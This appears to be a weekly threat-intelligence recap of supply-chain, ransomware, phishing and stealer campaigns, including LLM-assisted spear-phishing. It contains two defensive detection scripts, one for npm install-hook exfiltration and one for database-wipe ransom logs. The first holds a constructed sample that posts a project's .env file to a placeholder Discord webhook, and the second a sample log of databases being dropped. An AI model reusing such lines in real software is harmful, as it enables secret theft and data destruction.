Cybersecurity Threat Research ‘Weekly’ Recap. The report highlights ongoing package-manager abuse, covert C2 channels, and extortion trends, including malicious npm packages, Discord-based C2, and double-extortion operations. It also covers high-severity vulnerabilities being actively exploited, phishing advancements, information-stealing and MaaS developments, and the rise of malware-less database ransomware, with emphasis on detection challenges and CTI considerations.
#Discord #SonicWall #CVEs #Qilin #RansomHub #Storm-2657 #ChaosBot #LummaStealer #GhostSocks #CastleRAT #XWorm #WhatsAppWorm #ClayRat #CryptoScam #DatabaseRansomware #NVD
Package-ecosystem & supply-chain abuse
- Malicious packages across npm/PyPI/RubyGems used hard-coded Discord webhooks to exfiltrate files and secrets during install/runtime. Discord C2 in package registries.
- 175 npm packages served as coordinated phishing hosting (credential-harvesting redirects via unpkg.com) targeting 135+ orgs. 175 malicious npm packages host phishing infra.
- Stealit distributed Node.js stealers using experimental Single Executable Application (SEA) and Electron, with obfuscation and commercialized C2 panels. Stealit abusing Node.js SEA/Electron.
- Spoofed Homebrew installer sites copied brew.sh and injected hidden clipboard commands to install payloads (e.g., Odyssey Stealer). Homebrew spoofed sites inject malicious curl.
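The Discord-webhook exfiltration described above runs from install-time hooks, so a registry or CI check can look for it before a package is installed. The following scanner is an added example (not code from the report or from any of the vendors it cites); it assumes an npm tarball already unpacked into memory, and the package name, script and webhook id/token are constructed placeholders.

```python
import json
import re

# Discord webhook URLs have a numeric id and a URL-safe token; also matches the
# ptb./canary. clients and the legacy discordapp.com host.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+")
# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

def find_webhooks(text):
    """Return the distinct hard-coded Discord webhook URLs found in text."""
    return sorted(set(WEBHOOK_RE.findall(text)))

def audit_package(package_json, files):
    """package_json: raw package.json; files: {relative path: contents} from the tarball.
    Flags install-time hooks that embed a webhook or run a packaged file that does."""
    findings = []
    scripts = json.loads(package_json).get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = find_webhooks(cmd)
        # Resolve files named in the command (e.g. "node ./setup.js") and scan them too.
        for token in cmd.split():
            path = token.lstrip("./")
            if path in files:
                hits += find_webhooks(files[path])
        if hits:
            findings.append({"hook": hook, "command": cmd, "webhooks": sorted(set(hits))})
    return findings

# Constructed sample (not a real package): postinstall runs a script that POSTs the
# project's .env to a Discord webhook. The webhook id/token are made-up placeholders.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-utils", "version": "1.0.3",
    "scripts": {"postinstall": "node ./setup.js", "test": "jest"},
})
SAMPLE_FILES = {
    "setup.js": (
        "const fs=require('fs');const https=require('https');\n"
        "const hook='https://discord.com/api/webhooks/1234567890/EXAMPLE_TOKEN_abc-XYZ';\n"
        "https.request(hook,{method:'POST'}).end(fs.readFileSync('.env'));\n"),
}

if __name__ == "__main__":
    for f in audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES):
        print(f"[{f['hook']}] {f['command']} -> {', '.join(f['webhooks'])}")
```

The same regex can be applied to decoded strings (Base64, hex) since obfuscated samples rarely keep the URL in clear text; only the literal form is checked here.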
Covert C2 & platform abuse
- Novel Rust backdoor “ChaosBot” and other malware used Discord as a C2 channel, supporting remote commands, file transfer, and proxying. ChaosBot Rust backdoor (Discord C2).
Ransomware & extortion operations
- Scattered LAPSUS$ Hunters and affiliated groups (e.g., Bling Libra, Crimson Collective) steal cloud/SaaS data and offer extortion-as-a-service targeting retail, hospitality, and cloud providers. Bling Libra / Scattered LAPSUS$ extortion-as-a-service.
- Akira campaigns rapidly abuse SonicWall VPN flaws and stolen credentials to move laterally, harvest Veeam credentials, exfiltrate data and deploy ransomware in under an hour. Akira ransomware targeting SonicWall VPNs.
- Gunra operates double-extortion campaigns focused outside the US, using stealers, loaders and public leak sites/negotiation portals to monetize theft. Gunra double-extortion operations.
- Qilin (Rust-based RaaS) evolved with cross-platform targeting and advanced evasion; AttackIQ published emulations to validate defenses. Qilin RaaS: cross-platform emulation guidance.
- A rapid RansomHub-linked intrusion (SocGholish) was contained by Varonis after multi-stage credential theft and AzCopy exfiltration, with zero business downtime. RansomHub / SocGholish incident response (Varonis).
Access, exploits & critical vulnerability exploitation
- Widespread SonicWall SSLVPN compromises observed (credential use, MySonicWall backup exposure); organizations urged to reset secrets and enforce MFA. SonicWall SSLVPN widespread compromise.
- Active exploitation of GoAnywhere MFT deserialization (CVE-2025-10035, CVSS 10.0) used by threat actors to deploy RMM, rclone exfiltration, and ransomware. Active exploitation: GoAnywhere MFT CVE-2025-10035.
- Oracle released fixes and IOCs for an unauthenticated RCE in E-Business Suite (CVE-2025-61882); immediate patching and hunting recommended. Oracle EBS unauthenticated RCE CVE-2025-61882.
- RondoDox botnet used an “exploit shotgun” targeting 50+ CVEs to compromise routers, DVRs, NVRs and web servers worldwide. RondoDox exploit-shotgun botnet.
Phishing & social-engineering campaigns
- ClickFix social-engineering was commoditized into an IUAM ClickFix Generator phishing kit delivering DeerStealer and Odyssey via spoofed browser-verification pages and clipboard injection. IUAM ClickFix Generator phishing kit.
- Highly convincing invoice/W9 phishing targeted a Validin employee; investigators linked ~40 domains via template/hash and hosting patterns. Invoice/W9 phishing impersonating Ignitecore.
- Q3 campaign impersonated major brands (Red Bull, Tesla, Google, Ferrari) to target marketing professionals with job-application credential harvesting. Job-offer phishing targeting marketing pros.
- Targeted payroll pirate attacks (Storm-2657) used AITM phishing to steal MFA codes and redirect university payrolls via mailbox rules and Workday manipulation. Payroll redirect attacks (Storm-2657).
- Scammers spoofed 1Password Watchtower with typosquatted domains and Mandrill redirects to harvest credentials. 1Password Watchtower fake-breach phishing.
- Threat actors increasingly abuse Microsoft Teams features (chat/meetings/screenshare) across the attack chain for access, persistence, lateral movement, and extortion. Threats abusing Microsoft Teams collaboration.
- China-aligned UTA0388 used LLM assistance to generate multilingual spear-phish lures and delivered GOVERSHELL via search-order hijacking. UTA0388: LLM-assisted targeted phishing.
Infostealers, loaders, MaaS & access brokers
- Lumma Stealer resurfaced with obfuscation and AutoIt loaders; detection showcased via NSIS-signed sample analysis and ML-powered sandboxing. Lumma Stealer resurgence via NSIS installer.
- GhostSocks MaaS converts compromised hosts into residential SOCKS5 proxies (partnering with stealers) to monetize access and bypass fraud controls. GhostSocks MaaS: victims as proxy nodes.
- TAG-150 deployed CastleLoader/CastleBot and new CastleRAT variants (Python/C) via multi-tier infra and ClickFix/GitHub lures for reconnaissance and remote access. CastleRAT / CastleLoader campaigns (TAG-150).
- XWorm v6 returned with modular plugins (RDP, file manager, ransomware plugin) and links to cracked builders and NoCry code. XWorm v6 modular RAT & plugins.
Messaging worms, banking trojans & mobile threats
- A WhatsApp Web worm campaign in Brazil used ZIP→LNK→PowerShell chains to disable defenses and deliver a Selenium hijacker or Maverick banking trojan. WhatsApp Web worm delivering Maverick.
- ClayRat Android spyware sideloaded via Telegram/phishing pages stole SMS, calls, notifications, photos and self-propagated to contacts once granted SMS handler privileges. ClayRat Android spyware via sideloading.
Crypto scams & fraud infrastructure
- Coordinated crypto-scam network hosted fake wallet sites, malicious extension flows and profile “apps” to drain wallets; infrastructure and artifacts mapped to specific IPs/domains. Coordinated crypto-scam nexus & wallet phishing.
Database & infrastructure extortion (malware-less attacks)
- Attackers increasingly perform “malware-less” database ransomware by abusing exposed/misconfigured DBs (MongoDB, Postgres, MySQL, Redis, Elasticsearch) with legitimate DB commands for theft/destruction and ransom notes. Malware-less database ransomware trends & defenses.
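Because these attacks use only legitimate DB commands, the detection surface is the database's own query log rather than a file or process artifact. The function below is an added example (not from the report or any tool it cites) that groups MySQL general_log statements by connection and flags sessions that destroy data wholesale and then write a ransom-note table; the log lines are constructed for the example and the keyword list is an assumption to tune locally.

```python
import re
from collections import defaultdict

# MySQL general_log line: "<time>\t<thread_id> <command>\t<statement>", one statement per line.
LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")
# Legitimate statements that destroy data wholesale: DROP, TRUNCATE, or DELETE with no WHERE.
DESTRUCTIVE_RE = re.compile(
    r"^\s*(DROP\s+(DATABASE|SCHEMA|TABLE)\b|TRUNCATE\b|DELETE\s+FROM\s+\S+\s*;?\s*$)", re.I)
# Ransom notes are written back with ordinary DDL/DML; these strings recur in them (assumed list).
NOTE_KEYWORDS = ("readme", "warning", "recover", "restore", "bitcoin", "btc", "wallet")

def looks_like_ransom_note(sql):
    s = sql.lower()
    return s.startswith(("create table", "insert into")) and any(k in s for k in NOTE_KEYWORDS)

def detect_db_extortion(lines, drop_threshold=3):
    """Flag connections that issue mass destructive statements, or destruction plus a note."""
    sessions = defaultdict(lambda: {"destructive": [], "notes": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group(3) != "Query":
            continue                      # skip Connect/Quit/Init DB rows
        _, tid, _, sql = m.groups()
        s = sessions[tid]
        if DESTRUCTIVE_RE.match(sql):
            s["destructive"].append(sql)
        elif looks_like_ransom_note(sql):
            s["notes"].append(sql)
    alerts = []
    for tid, s in sessions.items():
        reasons = []
        if len(s["destructive"]) >= drop_threshold:
            reasons.append(f"{len(s['destructive'])} destructive statements")
        if s["destructive"] and s["notes"]:
            reasons.append("destruction followed by ransom-note write")
        if reasons:
            alerts.append({"thread": tid, "reasons": reasons})
    return alerts

# Constructed sample log (not from any real incident): thread 42 wipes two databases and
# leaves a note; thread 7 is an ordinary application session with a scoped DELETE.
SAMPLE_LOG = """\
2025-10-10T08:15:01.000001Z\t    7 Query\tSELECT id FROM orders WHERE status = 'open'
2025-10-10T08:15:03.000001Z\t   42 Query\tDROP DATABASE shop
2025-10-10T08:15:04.000001Z\t   42 Query\tDROP DATABASE crm
2025-10-10T08:15:05.000001Z\t   42 Query\tCREATE TABLE readme_to_recover (note TEXT)
2025-10-10T08:15:06.000001Z\t   42 Query\tINSERT INTO readme_to_recover VALUES ('send 0.1 BTC to wallet <placeholder>')
2025-10-10T08:15:07.000001Z\t    7 Query\tDELETE FROM sessions WHERE expires < NOW()
""".splitlines()
```

The same grouping logic transfers to Postgres (log_statement=all) or MongoDB profiler output with a different LINE_RE; the point is correlating destruction and note-writing within one client session rather than alerting on any single DROP.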
Detection, research, and threat intelligence quality
- NVD suffered a backlog with ~70% of recent CVEs awaiting analysis, urging use of alternative vulnerability sources (OSV.dev, vendor advisories) for timely patching. Vulnerability data crisis in NVD & mitigations.
- Kaspersky integrated an ML model into Kaspersky SIEM to detect DLL-hijacking (sideloading) and flagged real-world incidents (ToddyCat/Cobalt Strike, infostealer loaders). ML detection of DLL hijacking in SIEM.
- LABScon25 replay cautions on AI-agent use in CTI: productivity gains vs reliability/transparency risks; calls for adapted tradecraft and clear AI-assisted reporting. AI agents in CTI: analytical tradecraft risks.
- Elastic Security Labs’ 2025 Global Threat Report highlights AI-driven shifts, infostealer prevalence, and concentrated cloud attacks (Initial Access, Persistence, Credential Access). Elastic 2025 Global Threat Report.